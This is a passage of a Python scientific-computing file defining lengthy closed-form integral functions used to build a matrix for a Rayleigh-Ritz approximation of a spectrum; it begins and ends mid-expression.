+ 6 * a_conj ** 3 * (-3 - b + 4 * b ** 2)
)
+ a ** 3
* (
(-1 + b) ** 5
+ 6 * a_conj ** 4 * (-3 - b + 4 * b ** 2)
+ a_conj ** 6 * (-2 + 22 * b + 22 * b ** 2)
)
+ 3
* a ** 5
* (
8 * a_conj ** 6
+ a_conj ** 8
+ 2 * a_conj ** 4 * (1 + 8 * b)
+ 6 * a_conj ** 2 * (-1 + b ** 3)
)
)
- (1 / (b * (k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)))
* (
k_0
* (a + a_conj) ** 3
* (
a ** 6 * a_conj ** 6
+ (-1 + b) ** 3 * b ** 2 * (b + x ** 2)
- a ** 5 * a_conj ** 5 * (-3 + 2 * b + x ** 2)
+ a ** 4
* a_conj ** 4
* (3 - 17 * b ** 2 - 3 * x ** 2 - 3 * b * (-3 + x ** 2))
+ a ** 3
* a_conj ** 3
* (
1
- 28 * b ** 3
- 3 * x ** 2
- 2 * b ** 2 * (-3 + x ** 2)
- 12 * b * (-1 + x ** 2)
)
- k_3
* (
17 * b ** 4
+ x ** 2
- 2 * b ** 3 * (-3 + x ** 2)
+ 18 * b ** 2 * (-1 + x ** 2)
+ b * (-1 + 3 * x ** 2)
)
- k_0
* (-1 + b)
* b
* (
2 * b ** 3
+ 6 * x ** 2
+ b ** 2 * (11 - 3 * x ** 2)
+ b * (-1 + 9 * x ** 2)
)
)
)
)
)
+ (1 / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2))
* (
12
* a ** 3
* a_conj ** 3
* (a + a_conj)
* (
a ** 4 * a_conj ** 2 * (-2 + a_conj ** 2)
- 4 * k_2 * (1 + b)
+ 4 * a ** 3 * a_conj * (-1 + (-1 + a_conj ** 2) * b)
+ 4 * k_0 * b * (-1 + b + b ** 2)
- 2 * a_conj ** 2 * (1 + 3 * b + b ** 2)
+ (-1 + b) ** 2 * (1 + 4 * b + b ** 2)
- 2
* a ** 2
* (
1
+ a_conj ** 4
+ 3 * b
+ b ** 2
- a_conj ** 2 * (-1 + b + 3 * b ** 2)
)
)
* np.log(
k_0
- b
+ (k_0 + b) ** 2
+ k_1 * np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
)
)
+ (
12
* a ** 3
* a_conj ** 3
* (a + a_conj)
* (
a ** 4 * a_conj ** 2 * (-2 + a_conj ** 2)
- 4 * k_2 * (1 + b)
+ 4 * a ** 3 * a_conj * (-1 + (-1 + a_conj ** 2) * b)
+ 4 * k_0 * b * (-1 + b + b ** 2)
- 2 * a_conj ** 2 * (1 + 3 * b + b ** 2)
+ (-1 + b) ** 2 * (1 + 4 * b + b ** 2)
- 2
* a ** 2
* (
1
+ a_conj ** 4
+ 3 * b
+ b ** 2
- a_conj ** 2 * (-1 + b + 3 * b ** 2)
)
)
* np.log(1 + x ** 2)
)
/ (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2)
- (1 / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2))
* (
12
* a ** 3
* a_conj ** 3
* (a + a_conj)
* (
a ** 4 * a_conj ** 2 * (-2 + a_conj ** 2)
- 4 * k_2 * (1 + b)
+ 4 * a ** 3 * a_conj * (-1 + (-1 + a_conj ** 2) * b)
+ 4 * k_0 * b * (-1 + b + b ** 2)
- 2 * a_conj ** 2 * (1 + 3 * b + b ** 2)
+ (-1 + b) ** 2 * (1 + 4 * b + b ** 2)
- 2
* a ** 2
* (
1
+ a_conj ** 4
+ 3 * b
+ b ** 2
- a_conj ** 2 * (-1 + b + 3 * b ** 2)
)
)
* np.log(
k_0
- b
+ (k_0 + b) ** 2
- x ** 2
- k_0 * x ** 2
+ b * x ** 2
+ np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
* np.sqrt(-4 * k_0 * x ** 2 + (k_0 + b + x ** 2) ** 2)
)
)
)
return 4 * np.pi * c * ret
else:
return 0
def xxy_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return:
"""
a_conj = np.conj(a)
# helper variables to tidy up function
k_0 = a * a_conj
k_1 = np.sqrt((k_0 + b) ** 2)
k_2 = a ** 3 * a_conj ** 3
k_3 = a ** 2 * a_conj ** 2
if abs(a_conj) >= 0.00000001:
ret = (
(1 / 4)
* (a - a_conj)
* (
(2 * (a ** 2 + k_0 + a_conj ** 2)) / k_2
+ ((a ** 2 + k_0 + a_conj ** 2) * (-1 + k_0 + b)) / k_2
- (1 / (k_2 * b * (k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b)) ** 3))
* (
k_1
* (
a ** 8 * a_conj ** 6 * b
+ a_conj ** 2 * (-1 + b) ** 5 * b ** 2
+ a ** 7
* a_conj ** 5
* (-1 + (7 + a_conj ** 2) * b + 6 * b ** 2)
+ k_0
* b
* (
(-1 + b) ** 5 * b
+ a_conj ** 2 * (-1 + b) ** 3 * (2 + 5 * b + 6 * b ** 2)
)
+ a ** 6
* a_conj ** 4
* (
-3
+ 22 * b
+ a_conj ** 4 * b
+ 23 * b ** 2
+ 15 * b ** 3
+ a_conj ** 2 * (-2 + 7 * b + 6 * b ** 2)
)
+ a ** 5
* a_conj ** 3
* (
-3
- b
+ 32 * b ** 2
+ 22 * b ** 3
+ 20 * b ** 4
+ a_conj ** 4 * (-1 + 7 * b + 6 * b ** 2)
+ a_conj ** 2 * (-6 + 32 * b + 23 * b ** 2 + 15 * b ** 3)
)
+ a ** 2
* (-1 + b)
* (
(-1 + b) ** 4 * b ** 2
+ a_conj ** 2 * (-1 + b) ** 2 * b * (1 + 5 * b + 6 * b ** 2)
+ a_conj ** 4
* (1 + 20 * b + 17 * b ** 2 + 13 * b ** 3 + 15 * b ** 4)
)
+ a ** 4
* a_conj ** 2
* (
-1
- 19 * b
+ 3 * b ** 2
+ 4 * b ** 3
- 2 * b ** 4
+ 15 * b ** 5
+ a_conj ** 4 * (-3 + 22 * b + 23 * b ** 2 + 15 * b ** 3)
+ a_conj ** 2
* (-6 - 6 * b + 54 * b ** 2 + 22 * b ** 3 + 20 * b ** 4)
)
+ a ** 3
* (
a_conj * (-1 + b) ** 3 * b * (2 + 5 * b + 6 * b ** 2)
+ a_conj ** 5
* (-3 - b + 32 * b ** 2 + 22 * b ** 3 + 20 * b ** 4)
+ a_conj ** 3
* (
-2
- 33 * b
+ 8 * b ** 2
+ 14 * b ** 3
- 2 * b ** 4
+ 15 * b ** 5
)
)
)
)
- ((a ** 2 + k_0 + a_conj ** 2) * (-1 + k_0 + b))
/ (k_2 * (1 + x ** 2) ** 2)
- (2 * (a ** 2 + k_0 + a_conj ** 2)) / (k_2 * (1 + x ** 2))
+ (1 / (k_2 * (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** 3))
* (
np.sqrt((k_0 + b) ** 2 - 2 * k_0 * x ** 2 + 2 * b * x ** 2 + x ** 4)
* (
(1 / (1 + x ** 2) ** 2)
* (
(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
* (
a ** 6 * a_conj ** 4
+ a_conj ** 2 * (-1 + b) ** 4
+ a ** 5 * a_conj ** 3 * (2 + a_conj ** 2 + 4 * b)
+ a ** 2
* (
(-1 + b) ** 4
+ 6 * a_conj ** 4 * b ** 2
+ 2 * a_conj ** 2 * (-1 + b) ** 2 * (1 + 2 * b)
)
+ a ** 4
* (
a_conj ** 6
+ 6 * a_conj ** 2 * b ** 2
+ a_conj ** 4 * (2 + 4 * b)
)
+ k_0
* (
(-1 + b) ** 4
+ a_conj ** 2 * (-1 + b) ** 2 * (2 + 4 * b)
)
+ 2
* a ** 3
* (
a_conj ** 5 * (1 + 2 * b)
+ a_conj * (-1 + b) ** 2 * (1 + 2 * b)
+ a_conj ** 3 * (-1 + 3 * b ** 2)
)
)
)
+ (1 / (1 + x ** 2))
* (
3 * a ** 7 * a_conj ** 5
+ a_conj ** 2 * (-1 + b) ** 5
+ a ** 6 * (3 * a_conj ** 6 + 13 * a_conj ** 4 * (1 + b))
+ k_0
* (
(-1 + b) ** 5
+ 7 * a_conj ** 2 * (-1 + b) ** 3 * (1 + b)
)
+ a ** 5
* a_conj ** 3
* (
-2
+ 3 * a_conj ** 4
+ 22 * b
+ 22 * b ** 2
+ a_conj ** 2 * (21 + 13 * b)
)
+ a ** 4
* (
13 * a_conj ** 6 * (1 + b)
+ 2 * a_conj ** 4 * b * (19 + 11 * b)
+ 18 * a_conj ** 2 * (-1 + b ** 3)
)
+ a ** 2
* (
(-1 + b) ** 5
+ 7 * a_conj ** 2 * (-1 + b) ** 3 * (1 + b)
+ 18 * a_conj ** 4 * (-1 + b ** 3)
)
+ a ** 3
* (
7 * a_conj * (-1 + b) ** 3 * (1 + b)
+ a_conj ** 5 * (-2 + 22 * b + 22 * b ** 2)
+ 2 * a_conj ** 3 * (-12 - b + 4 * b ** 2 + 9 * b ** 3)
)
)
- (1 / (b * (k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)))
* (
k_0
* (a + a_conj) ** 2
* (
a ** 6 * a_conj ** 6
+ (-1 + b) ** 3 * b ** 2 * (b + x ** 2)
- a ** 5 * a_conj ** 5 * (-3 + 2 * b + x ** 2)
+ a ** 4
* a_conj ** 4
* (3 - 17 * b ** 2 - 3 * x ** 2 - 3 * b * (-3 + x ** 2))
+ k_2
* (
1
- 28 * b ** 3
- 3 * x ** 2
- 2 * b ** 2 * (-3 + x ** 2)
- 12 * b * (-1 + x ** 2)
)
- k_3
* (
17 * b ** 4
+ x ** 2
- 2 * b ** 3 * (-3 + x ** 2)
+ 18 * b ** 2 * (-1 + x ** 2)
+ b * (-1 + 3 * x ** 2)
)
- k_0
* (-1 + b)
* b
* (
2 * b ** 3
+ 6 * x ** 2
+ b ** 2 * (11 - 3 * x ** 2)
+ b * (-1 + 9 * x ** 2)
)
)
)
)
)
+ (1 / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2))
* (
4
* (
a ** 4 * a_conj ** 2 * (-6 + a_conj ** 2)
- 6 * a_conj ** 2 * (1 + 3 * b + b ** 2)
+ (-1 + b) ** 2 * (1 + 4 * b + b ** 2)
+ 4 * a ** 3 * (a_conj ** 3 * (-2 + b) - 3 * a_conj * (1 + b))
- 4
* k_0
* (2 + 7 * b + b ** 2 - b ** 3 + 3 * a_conj ** 2 * (1 + b))
- 2
* a ** 2
* (
3 * a_conj ** 4
+ a_conj ** 2 * (9 + 7 * b - 3 * b ** 2)
+ 3 * (1 + 3 * b + b ** 2)
)
)
* np.log(
k_0
- b
+ (k_0 + b) ** 2
+ k_1 * np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
)
)
+ (
4
* (
a ** 4 * a_conj ** 2 * (-6 + a_conj ** 2)
- 6 * a_conj ** 2 * (1 + 3 * b + b ** 2)
+ (-1 + b) ** 2 * (1 + 4 * b + b ** 2)
+ 4 * a ** 3 * (a_conj ** 3 * (-2 + b) - 3 * a_conj * (1 + b))
- 4
* k_0
* (2 + 7 * b + b ** 2 - b ** 3 + 3 * a_conj ** 2 * (1 + b))
- 2
* a ** 2
* (
3 * a_conj ** 4
+ a_conj ** 2 * (9 + 7 * b - 3 * b ** 2)
+ 3 * (1 + 3 * b + b ** 2)
)
)
* np.log(1 + x ** 2)
)
/ (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2)
- (1 / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2))
* (
4
* (
a ** 4 * a_conj ** 2 * (-6 + a_conj ** 2)
- 6 * a_conj ** 2 * (1 + 3 * b + b ** 2)
+ (-1 + b) ** 2 * (1 + 4 * b + b ** 2)
+ 4 * a ** 3 * (a_conj ** 3 * (-2 + b) - 3 * a_conj * (1 + b))
- 4
* k_0
* (2 + 7 * b + b ** 2 - b ** 3 + 3 * a_conj ** 2 * (1 + b))
- 2
* a ** 2
* (
3 * a_conj ** 4
+ a_conj ** 2 * (9 + 7 * b - 3 * b ** 2)
+ 3 * (1 + 3 * b + b ** 2)
)
)
* np.log(
k_0
- b
+ (k_0 + b) ** 2
- x ** 2
- k_0 * x ** 2
+ b * x ** 2
+ np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
* np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
)
)
)
)
return (4 / 1j) * np.pi * c * ret
else:
return 0
def xxz_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return:
"""
a_conj = np.conj(a)
# helper variables to tidy up function
k_0 = a * a_conj
k_1 = a * a_conj ** 3
k_2 = a ** 2 * a_conj ** 2
k_3 = a ** 4 * a_conj ** 2
if abs(a_conj) >= 0.00000001:
ret = (1 / 2) * (
(1 / (k_2 * b * (k_2 + (-1 + b) ** 2 + 2 * k_0 * (1 + b)) ** 3))
* (
np.sqrt((k_0 + b) ** 2)
* (
(-(a ** 7)) * a_conj ** 5
+ a_conj ** 2 * (-1 + b) ** 4 * b
- a ** 6 * a_conj ** 4 * (2 + 2 * a_conj ** 2 + b)
- a ** 5
* (
a_conj ** 7
+ a_conj ** 5 * (4 - 8 * b)
+ 2 * a_conj ** 3 * (23 - 2 * b) * b
)
+ k_1 * (-1 + b) ** 2 * (1 + 12 * b + 5 * b ** 2)
- k_3
* (
-2
+ 36 * b
+ 4 * a_conj ** 2 * (16 - 9 * b) * b
+ 38 * b ** 2
- 8 * b ** 3
+ a_conj ** 4 * (2 + b)
)
+ a ** 2
* (
(-1 + b) ** 4 * b
+ 2 * a_conj ** 2 * (-1 + b) ** 2 * (1 + 14 * b + 7 * b ** 2)
+ a_conj ** 4 * (2 - 36 * b - 38 * b ** 2 + 8 * b ** 3)
)
+ a ** 3
* (
2 * a_conj ** 5 * b * (-23 + 2 * b)
+ a_conj * (-1 + b) ** 2 * (1 + 12 * b + 5 * b ** 2)
+ a_conj ** 3 * (4 - 48 * b - 60 * b ** 2 + 40 * b ** 3)
)
)
)
- (a ** 2 + a_conj ** 2) / (k_2 * (1 + x ** 2) ** 2)
+ (a ** 2 + a_conj ** 2) / (k_2 * (1 + x ** 2))
+ (1 / (k_2 * (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** 3))
* (
np.sqrt((k_0 + b) ** 2 - 2 * k_0 * x ** 2 + 2 * b * x ** 2 + x ** 4)
* (
(
(k_2 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
* (
a ** 5 * a_conj ** 3
+ a_conj ** 2 * (-1 + b) ** 3
+ 3 * k_3 * (1 + b)
+ 3 * k_1 * (-1 + b ** 2)
+ a ** 3
* a_conj
* (-3 + 4 * a_conj ** 2 + a_conj ** 4 + 3 * b ** 2)
+ a ** 2
* (
4 * a_conj ** 2 * (-1 + b)
+ (-1 + b) ** 3
+ 3 * a_conj ** 4 * (1 + b)
)
)
)
/ (1 + x ** 2) ** 2
- (1 / (1 + x ** 2))
* (
a ** 7 * a_conj ** 5
+ a_conj ** 2 * (-1 + b) ** 4 * b
+ a ** 6 * a_conj ** 4 * (4 + 5 * b)
+ a ** 5
* a_conj ** 3
* (-24 + 12 * a_conj ** 2 + a_conj ** 4 + 8 * b + 10 * b ** 2)
+ k_1 * (-1 + 4 * b - 8 * b ** 3 + 5 * b ** 4)
+ k_3
* (
-28
- 30 * b
+ 10 * b ** 3
+ 12 * a_conj ** 2 * (-2 + 3 * b)
+ a_conj ** 4 * (4 + 5 * b)
)
+ a ** 3
* a_conj
* (
-1
+ 4 * b
- 8 * b ** 3
+ 5 * b ** 4
+ 2 * a_conj ** 4 * (-12 + 4 * b + 5 * b ** 2)
+ 4 * a_conj ** 2 * (-7 - 10 * b + 9 * b ** 2)
)
+ a ** 2
* (
(-1 + b) ** 4 * b
+ 4 * a_conj ** 2 * (-1 + b) ** 2 * (2 + 3 * b)
+ 2 * a_conj ** 4 * (-14 - 15 * b + 5 * b ** 3)
)
)
+ (1 / (b * (k_2 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)))
* (
k_0
* (a + a_conj) ** 2
* (
a ** 6 * a_conj ** 6
+ a ** 5 * a_conj ** 5 * (2 + 2 * b - x ** 2)
- (-1 + b) ** 2
* b
* (
b
+ 3 * b ** 3
+ 3 * x ** 2
+ 8 * b * x ** 2
+ b ** 2 * (8 + x ** 2)
)
- 2
* a ** 3
* a_conj ** 3
* (
1
+ 10 * b ** 3
+ 6 * b * (-1 + x ** 2)
+ b ** 2 * (-26 + 5 * x ** 2)
)
- a ** 4
* a_conj ** 4
* (5 * b ** 2 + 2 * x ** 2 + b * (-22 + 5 * x ** 2))
- k_2
* (
1
+ 25 * b ** 4
- 2 * x ** 2
+ 12 * b ** 2 * (-3 + 2 * x ** 2)
+ 2 * b ** 3 * (-22 + 5 * x ** 2)
- 2 * b * (-5 + 6 * x ** 2)
)
+ k_0
* (
-14 * b ** 5
+ x ** 2
- 5 * b ** 4 * (-2 + x ** 2)
- 4 * b ** 3 * (-9 + 5 * x ** 2)
+ 2 * b * (-1 + 8 * x ** 2)
+ 2 * b ** 2 * (-7 + 12 * x ** 2)
)
)
)
)
)
- (1 / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2))
* (
4
* (-1 + k_0 + b)
* (
k_3 * (-6 + a_conj ** 2)
- 6 * a_conj ** 2 * (1 + 3 * b + b ** 2)
+ (-1 + b) ** 2 * (1 + 4 * b + b ** 2)
+ 4 * a ** 3 * (a_conj ** 3 * (-2 + b) - 3 * a_conj * (1 + b))
- 4
* k_0
* (2 + 7 * b + b ** 2 - b ** 3 + 3 * a_conj ** 2 * (1 + b))
- 2
* a ** 2
* (
3 * a_conj ** 4
+ a_conj ** 2 * (9 + 7 * b - 3 * b ** 2)
+ 3 * (1 + 3 * b + b ** 2)
)
)
* np.arctanh(
(k_2 + (-1 + b) * b + a * (a_conj + 2 * a_conj * b))
/ (
np.sqrt((k_0 + b) ** 2)
* np.sqrt(k_2 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
)
)
)
+ (1 / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2))
* (
4
* (-1 + k_0 + b)
* (
k_3 * (-6 + a_conj ** 2)
- 6 * a_conj ** 2 * (1 + 3 * b + b ** 2)
+ (-1 + b) ** 2 * (1 + 4 * b + b ** 2)
+ 4 * a ** 3 * (a_conj ** 3 * (-2 + b) - 3 * a_conj * (1 + b))
- 4
* k_0
* (2 + 7 * b + b ** 2 - b ** 3 + 3 * a_conj ** 2 * (1 + b))
- 2
* a ** 2
* (
3 * a_conj ** 4
+ a_conj ** 2 * (9 + 7 * b - 3 * b ** 2)
+ 3 * (1 + 3 * b + b ** 2)
)
)
* np.arctanh(
(k_2 + k_0 * (1 + 2 * b - x ** 2) + (-1 + b) * (b + x ** 2))
/ (
np.sqrt(k_2 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
* np.sqrt(k_2 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
)
)
)
)
return 2 * np.pi * c * ret
if abs(a_conj) < 0.00000001 and (b - 1) ** 2 > 0.00000001:
ret = (
-1
- (-1 + b) ** 2
+ b ** 2
+ (-1 + b) * (1 + 3 * b)
+ (-1 + b) ** 2 / (1 + x ** 2) ** 2
+ (1 + 2 * b - 3 * b ** 2) / (1 + x ** 2)
+ (b - b ** 3) / (b + x ** 2)
- (1 + 4 * b + b ** 2) * np.log(b)
- (1 + 4 * b + b ** 2) * np.log(1 + x ** 2)
+ (1 + 4 * b + b ** 2) * np.log(b + x ** 2)
) / (-1 + b) ** 4
return 4 * np.pi * c * ret
if abs(a_conj) < 0.00000001 and (b - 1) ** 2 <= 0.00000001:
ret = 2 * x ** 4 / (4 * (1 + x ** 2) ** 4)
return 4 * np.pi * c * ret
def xyz_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return:
"""
a_conj = np.conj(a)
# helper variables to tidy up function
k_0 = a * a_conj
k_1 = a ** 2 * a_conj ** 2
if abs(a_conj) >= 0.00000001:
ret = (
(1 / 4)
* (a ** 2 - a_conj ** 2)
* (
(
np.sqrt((k_0 + b) ** 2)
* (
(-(a ** 5)) * a_conj ** 5
+ (-1 + b) ** 4 * b
- a ** 4 * a_conj ** 4 * (2 + b)
+ 2 * a ** 3 * a_conj ** 3 * b * (-23 + 2 * b)
+ k_0 * (-1 + b) ** 2 * (1 + 12 * b + 5 * b ** 2)
+ 2 * k_1 * (1 - 18 * b - 19 * b ** 2 + 4 * b ** 3)
)
)
/ (k_1 * b * (k_1 + (-1 + b) ** 2 + 2 * k_0 * (1 + b)) ** 3)
- 1 / (k_1 * (1 + x ** 2) ** 2)
+ 1 / (k_1 * (1 + x ** 2))
- (
(-1 + b) ** 4 * b * (b + x ** 2) ** 2 * (1 + b * x ** 2)
- a ** 7 * a_conj ** 7 * (1 - (-2 + b) * x ** 2 + x ** 4)
+ a ** 6
* a_conj ** 6
* (
-2
- 3 * x ** 2
+ 7 * b ** 2 * x ** 2
+ x ** 6
- b * (3 + 4 * x ** 4)
)
+ a ** 5
* a_conj ** 5
* (
21 * b ** 3 * x ** 2
+ 2 * (x + x ** 3) ** 2
+ b ** 2 * (1 + 26 * x ** 2 - 3 * x ** 4)
+ b * (-50 - 61 * x ** 2 - 20 * x ** 4 + 6 * x ** 6)
)
+ k_0
* (-1 + b) ** 2
* b
* (
x ** 2
+ 7 * b ** 4 * x ** 2
+ 10 * x ** 4
+ 2 * x ** 6
+ b ** 3 * (7 + 4 * x ** 2 + 11 * x ** 4)
+ 2 * b ** 2 * (4 + 10 * x ** 2 + 9 * x ** 4 + 3 * x ** 6)
+ b * (3 + 22 * x ** 2 + 15 * x ** 4 + 10 * x ** 6)
)
+ a ** 3
* a_conj ** 3
* (
1
+ 35 * b ** 5 * x ** 2
- 3 * x ** 4
- 2 * x ** 6
+ 25 * b ** 4 * (1 + x ** 2) ** 2
+ b * (14 + 55 * x ** 2 + 14 * x ** 4 - 36 * x ** 6)
+ 2 * b ** 3 * (-60 - 83 * x ** 2 - 4 * x ** 4 + 10 * x ** 6)
+ 2 * b ** 2 * (-45 - 54 * x ** 2 + 11 * x ** 4 + 16 * x ** 6)
)
+ a ** 4
* a_conj ** 4
* (
35 * b ** 4 * x ** 2
+ 2 * (1 + x ** 2) ** 2
+ 5 * b ** 3 * (3 + 12 * x ** 2 + 2 * x ** 4)
+ b ** 2 * (-132 - 170 * x ** 2 - 40 * x ** 4 + 15 * x ** 6)
+ b * (-36 + 16 * x ** 2 + 59 * x ** 4 + 16 * x ** 6)
)
+ k_1
* (
21 * b ** 6 * x ** 2
- (x + x ** 3) ** 2
+ b ** 5 * (19 + 8 * x ** 2 + 24 * x ** 4)
+ 2 * b ** 3 * (-33 - 62 * x ** 2 - 28 * x ** 4 + 10 * x ** 6)
+ b ** 4 * (-38 - 43 * x ** 2 + 16 * x ** 4 + 15 * x ** 6)
- b * (-3 + 20 * x ** 2 + 52 * x ** 4 + 44 * x ** 6)
- b ** 2 * (-18 + 33 * x ** 2 + 122 * x ** 4 + 54 * x ** 6)
)
)
/ (
k_1
* b
* (k_1 + (-1 + b) ** 2 + 2 * k_0 * (1 + b)) ** 3
* (1 + x ** 2) ** 2
* np.sqrt(
(k_0 + b) ** 2 - 2 * k_0 * x ** 2 + 2 * b * x ** 2 + x ** 4
)
)
+ (
24
* (-1 + k_0 + b)
* (1 + k_1 + 3 * b + b ** 2 + 2 * k_0 * (1 + b))
* np.log(
k_0
- b
+ (k_0 + b) ** 2
+ np.sqrt((k_0 + b) ** 2)
* np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
)
)
/ (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2)
+ (
24
* (-1 + k_0 + b)
* (1 + k_1 + 3 * b + b ** 2 + 2 * k_0 * (1 + b))
* np.log(1 + x ** 2)
)
/ (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2)
- (
24
* (-1 + k_0 + b)
* (1 + k_1 + 3 * b + b ** 2 + 2 * k_0 * (1 + b))
* np.log(
k_1
- b
+ b ** 2
- x ** 2
+ b * x ** 2
+ k_0 * (1 + 2 * b - x ** 2)
+ np.sqrt(k_1 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
* np.sqrt(k_1 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
)
)
/ (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2)
)
)
return (4 / 1j) * np.pi * c * ret
else:
return 0
def zzz_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return:
"""
a_conj = np.conj(a)
if abs(a_conj) >= 0.00000001:
ret = (
-(
np.sqrt((a * a_conj + b) ** 2)
* (
a ** 6 * a_conj ** 6
+ 6 * a ** 5 * a_conj ** 5 * b
+ 4 * a ** 3 * a_conj ** 3 * b * (-29 + 28 * b + 5 * b ** 2)
+ a ** 4 * a_conj ** 4 * (-3 + 28 * b + 15 * b ** 2)
+ (-1 + b) ** 2 * (-1 + 10 * b + 48 * b ** 2 + 30 * b ** 3 + b ** 4)
+ 2
* a
* a_conj
* b
* (39 - 96 * b - 66 * b ** 2 + 56 * b ** 3 + 3 * b ** 4)
+ 3
* a ** 2
* a_conj ** 2
* (1 - 24 * b - 78 * b ** 2 + 56 * b ** 3 + 5 * b ** 4)
)
/ (
4
* b
* (a * a_conj + b)
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 3
)
)
+ (
a ** 7 * a_conj ** 7 * (1 + x ** 2) ** 2
+ a ** 6 * a_conj ** 6 * (7 * b - x ** 2) * (1 + x ** 2) ** 2
+ a ** 5
* a_conj ** 5
* (
-3 * (1 + x ** 2) ** 2
+ 21 * b ** 2 * (1 + x ** 2) ** 2
+ b * (28 + 42 * x ** 2 - 6 * x ** 6)
)
+ a ** 4
* a_conj ** 4
* (
35 * b ** 3 * (1 + x ** 2) ** 2
+ 3 * (x + x ** 3) ** 2
- 5 * b ** 2 * (-28 - 45 * x ** 2 - 6 * x ** 4 + 3 * x ** 6)
+ b * (-119 - 194 * x ** 2 - 87 * x ** 4 + 12 * x ** 6)
)
+ a ** 3
* a_conj ** 3
* (
3 * (1 + x ** 2) ** 2
+ 35 * b ** 4 * (1 + x ** 2) ** 2
- 20 * b ** 3 * (-14 - 23 * x ** 2 - 4 * x ** 4 + x ** 6)
+ 4 * b * (-18 + 17 * x ** 2 + 52 * x ** 4 + 21 * x ** 6)
+ 2 * b ** 2 * (-175 - 270 * x ** 2 - 87 * x ** 4 + 24 * x ** 6)
)
+ (-1 + b) ** 2
* (
b ** 5 * (1 + x ** 2) ** 2
+ (x + x ** 3) ** 2
+ b ** 4 * (30 + 51 * x ** 2 + 12 * x ** 4 - x ** 6)
+ 2 * b ** 3 * (24 + 53 * x ** 2 + 46 * x ** 4 + 5 * x ** 6)
+ 2 * b ** 2 * (5 + 46 * x ** 2 + 53 * x ** 4 + 24 * x ** 6)
+ b * (-1 + 12 * x ** 2 + 51 * x ** 4 + 30 * x ** 6)
)
+ a
* a_conj
* (
-((1 + x ** 2) ** 2)
+ 7 * b ** 6 * (1 + x ** 2) ** 2
+ b ** 2 * (105 + 2 * x ** 2 - 327 * x ** 4 - 192 * x ** 6)
+ b ** 5 * (140 + 234 * x ** 2 + 48 * x ** 4 - 6 * x ** 6)
+ 4 * b ** 3 * (-62 - 99 * x ** 2 - 16 * x ** 4 + 33 * x ** 6)
+ b ** 4 * (-143 - 158 * x ** 2 + 129 * x ** 4 + 48 * x ** 6)
- 2 * b * (-6 + 39 * x ** 2 + 88 * x ** 4 + 55 * x ** 6)
)
+ a ** 2
* a_conj ** 2
* (
21 * b ** 5 * (1 + x ** 2) ** 2
- 3 * (x + x ** 3) ** 2
+ b * (81 + 202 * x ** 2 + 65 * x ** 4 - 72 * x ** 6)
+ 5 * b ** 4 * (56 + 93 * x ** 2 + 18 * x ** 4 - 3 * x ** 6)
+ 6 * b ** 3 * (-61 - 86 * x ** 2 - 5 * x ** 4 + 12 * x ** 6)
+ 2 * b ** 2 * (-132 - 131 * x ** 2 + 102 * x ** 4 + 93 * x ** 6)
)
)
/ (
4
* b
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b)) ** 3
* (1 + x ** 2) ** 2
* np.sqrt(
(a * a_conj + b) ** 2
- 2 * a * a_conj * x ** 2
+ 2 * b * x ** 2
+ x ** 4
)
)
+ 3
* (-1 + a * a_conj + b)
* (
a ** 4 * a_conj ** 4
+ 4 * a ** 3 * a_conj ** 3 * (-1 + b)
+ (-1 + b ** 2) ** 2
+ 2 * a ** 2 * a_conj ** 2 * (-5 - 4 * b + 3 * b ** 2)
+ 4 * a * a_conj * (-1 - 5 * b - b ** 2 + b ** 3)
)
* np.log(
a * a_conj
- b
+ (a * a_conj + b) ** 2
+ np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
)
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (7 / 2)
+ 3
* (-1 + a * a_conj + b)
* (
a ** 4 * a_conj ** 4
+ 4 * a ** 3 * a_conj ** 3 * (-1 + b)
+ (-1 + b ** 2) ** 2
